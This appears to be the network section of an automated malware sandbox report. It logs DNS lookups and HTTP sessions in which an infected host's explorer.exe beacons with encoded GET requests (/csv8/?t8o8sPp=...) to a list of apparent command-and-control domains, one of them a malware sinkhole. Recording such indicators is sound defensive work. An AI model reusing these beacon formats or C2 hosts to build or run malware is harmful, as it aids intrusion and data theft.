Jan 13, 2021 21:04:26.231012106 CET	192.168.2.3	8.8.8.8	0x918b	Standard query (0)	www.herbmedia.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:27.245870113 CET	192.168.2.3	8.8.8.8	0x918b	Standard query (0)	www.herbmedia.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:33.048207998 CET	192.168.2.3	8.8.8.8	0x42a0	Standard query (0)	www.travelnetafrica.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:38.657728910 CET	192.168.2.3	8.8.8.8	0x8c8c	Standard query (0)	www.latin-hotspot.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:44.082952976 CET	192.168.2.3	8.8.8.8	0xdaa8	Standard query (0)	www.procreditexpert.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:49.551908016 CET	192.168.2.3	8.8.8.8	0x396c	Standard query (0)	www.fessusesefsee.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:54.751828909 CET	192.168.2.3	8.8.8.8	0x6415	Standard query (0)	www.queensboutique1000.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:00.530175924 CET	192.168.2.3	8.8.8.8	0xb972	Standard query (0)	www.studentdividers.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:05.785716057 CET	192.168.2.3	8.8.8.8	0x8969	Standard query (0)	www.logansshop.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:10.945827961 CET	192.168.2.3	8.8.8.8	0xdc07	Standard query (0)	www.epicmassiveconcepts.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:21.233468056 CET	192.168.2.3	8.8.8.8	0xc400	Standard query (0)	www.exit-divorce.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:27.478451014 CET	192.168.2.3	8.8.8.8	0x52c6	Standard query (0)	www.splendidhotelspa.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:33.115914106 CET	192.168.2.3	8.8.8.8	0xb023	Standard query (0)	www.thesouthbeachlife.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:38.215327024 CET	192.168.2.3	8.8.8.8	0x4d47	Standard query (0)	www.stnanguo.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:43.839272976 CET	192.168.2.3	8.8.8.8	0xfccc	Standard query (0)	www.alparmuhendislik.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:49.944683075 CET	192.168.2.3	8.8.8.8	0x7b79	Standard query (0)	www.soundon.events	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:55.316931963 CET	192.168.2.3	8.8.8.8	0x8d54	Standard query (0)	www.herbmedia.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:56.331440926 CET	192.168.2.3	8.8.8.8	0x8d54	Standard query (0)	www.herbmedia.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:57.347142935 CET	192.168.2.3	8.8.8.8	0x8d54	Standard query (0)	www.herbmedia.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:06:07.773875952 CET	192.168.2.3	8.8.8.8	0x93cd	Standard query (0)	www.latin-hotspot.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 21:04:28.032321930 CET	8.8.8.8	192.168.2.3	0x918b	Server failure (2)	www.herbmedia.net	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:29.053430080 CET	8.8.8.8	192.168.2.3	0x918b	Server failure (2)	www.herbmedia.net	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:33.252438068 CET	8.8.8.8	192.168.2.3	0x42a0	No error (0)	www.travelnetafrica.com		173.234.175.134	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:44.243922949 CET	8.8.8.8	192.168.2.3	0xdaa8	No error (0)	www.procreditexpert.com	us20-d42e32e7-5da32c142596003de06ec4b5a.pages.mailchi.mp		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:04:44.243922949 CET	8.8.8.8	192.168.2.3	0xdaa8	No error (0)	us20-d42e32e7-5da32c142596003de06ec4b5a.pages.mailchi.mp	terminator.capstone.com.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:04:49.624840021 CET	8.8.8.8	192.168.2.3	0x396c	No error (0)	www.fessusesefsee.com		45.77.226.209	A (IP address)	IN (0x0001)
Jan 13, 2021 21:04:54.836445093 CET	8.8.8.8	192.168.2.3	0x6415	No error (0)	www.queensboutique1000.com	queensboutique1000.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:04:54.836445093 CET	8.8.8.8	192.168.2.3	0x6415	No error (0)	queensboutique1000.com		142.44.212.169	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:00.592801094 CET	8.8.8.8	192.168.2.3	0xb972	No error (0)	www.studentdividers.com	studentdividers.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:05:00.592801094 CET	8.8.8.8	192.168.2.3	0xb972	No error (0)	studentdividers.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:05.850408077 CET	8.8.8.8	192.168.2.3	0x8969	No error (0)	www.logansshop.net	logansshop.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:05:05.850408077 CET	8.8.8.8	192.168.2.3	0x8969	No error (0)	logansshop.net		192.0.78.208	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:05.850408077 CET	8.8.8.8	192.168.2.3	0x8969	No error (0)	logansshop.net		192.0.78.138	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:11.003951073 CET	8.8.8.8	192.168.2.3	0xdc07	No error (0)	www.epicmassiveconcepts.com	epicmassiveconcepts.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:05:11.003951073 CET	8.8.8.8	192.168.2.3	0xdc07	No error (0)	epicmassiveconcepts.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:21.578461885 CET	8.8.8.8	192.168.2.3	0xc400	No error (0)	www.exit-divorce.com		192.155.166.181	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:27.704834938 CET	8.8.8.8	192.168.2.3	0x52c6	No error (0)	www.splendidhotelspa.com	splendidhotelspa.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:05:27.704834938 CET	8.8.8.8	192.168.2.3	0x52c6	No error (0)	splendidhotelspa.com		205.134.254.189	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:33.178495884 CET	8.8.8.8	192.168.2.3	0xb023	Name error (3)	www.thesouthbeachlife.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:38.447403908 CET	8.8.8.8	192.168.2.3	0x4d47	No error (0)	www.stnanguo.com		146.148.193.212	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:44.220861912 CET	8.8.8.8	192.168.2.3	0xfccc	No error (0)	www.alparmuhendislik.com		23.105.124.225	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:50.007997036 CET	8.8.8.8	192.168.2.3	0x7b79	No error (0)	www.soundon.events	ext-cust.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:05:50.007997036 CET	8.8.8.8	192.168.2.3	0x7b79	No error (0)	ext-cust.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:50.007997036 CET	8.8.8.8	192.168.2.3	0x7b79	No error (0)	ext-cust.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:57.374772072 CET	8.8.8.8	192.168.2.3	0x8d54	Server failure (2)	www.herbmedia.net	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:58.107872963 CET	8.8.8.8	192.168.2.3	0x8d54	Server failure (2)	www.herbmedia.net	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:05:59.126219034 CET	8.8.8.8	192.168.2.3	0x8d54	Server failure (2)	www.herbmedia.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.travelnetafrica.com

www.fessusesefsee.com

www.queensboutique1000.com

www.studentdividers.com

www.logansshop.net

www.epicmassiveconcepts.com

www.exit-divorce.com

www.splendidhotelspa.com

www.stnanguo.com

www.alparmuhendislik.com

www.soundon.events

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49742	173.234.175.134	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:04:33.449708939 CET	6475	OUT	GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1 Host: www.travelnetafrica.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:04:33.642399073 CET	6476	IN	HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST Date: Wed, 13 Jan 2021 20:04:32 GMT Connection: close Content-Length: 4298 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 80 bc e4 b8 8d e8 83 bd e4 b8 ba 20 6e 75 6c 6c e3 80 82 3c 62 72 3e e5 8f 82 e6 95 b0 e5 90 8d 3a 20 69 6e 70 75 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 20 7d 0d Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:pointer; }
Jan 13, 2021 21:04:33.642426014 CET	6478	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 33 39 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 20 77 69 64 74 68 3a 20 34 34 30 70 78 3b 20 6f 76 Data Ascii: @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; }
Jan 13, 2021 21:04:33.642443895 CET	6479	IN	Data Raw: 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e e5 a0 86 e6 a0 88 e8 b7 9f e8 b8 aa 3a 3c 2f 62 3e 20 Data Ascii: tr> </table> <br> <b>:</b> <br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>[ArgumentNullExce
Jan 13, 2021 21:04:33.642457962 CET	6480	IN	Data Raw: 67 65 6e 74 29 0d 0a 20 20 20 e5 9c a8 20 41 6e 74 49 6d 61 67 65 47 72 6f 75 70 2e 41 73 70 4e 65 74 2e 52 65 71 75 65 73 74 49 6e 74 65 72 63 65 70 74 4d 6f 64 75 6c 65 2e 43 6f 6e 74 65 78 74 5f 42 65 67 69 6e 52 65 71 75 65 73 74 28 4f 62 6a Data Ascii: gent) AntImageGroup.AspNet.RequestInterceptModule.Context_BeginRequest(Object sender, EventArgs e) System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() System.Web.HttpApp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49755	45.77.226.209	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:04:49.690268040 CET	9647	OUT	GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1 Host: www.fessusesefsee.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:04:49.742832899 CET	9648	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 20:16:25 GMT Server: X-SinkHole: Malware DNS SinkHole Server Content-Length: 307 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49768	198.49.23.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:05:50.138555050 CET	9995	OUT	GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1 Host: www.soundon.events Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:05:50.268177986 CET	9996	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Wed, 13 Jan 2021 20:05:50 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: evn59O79/p8IFMy6X Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Jan 13, 2021 21:05:50.268213034 CET	9997	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Jan 13, 2021 21:05:50.268237114 CET	9999	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Jan 13, 2021 21:05:50.268254995 CET	9999	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Jan 13, 2021 21:05:50.268275976 CET	10000	IN	Data Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
Jan 13, 2021 21:05:50.268301010 CET	10002	IN	Data Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
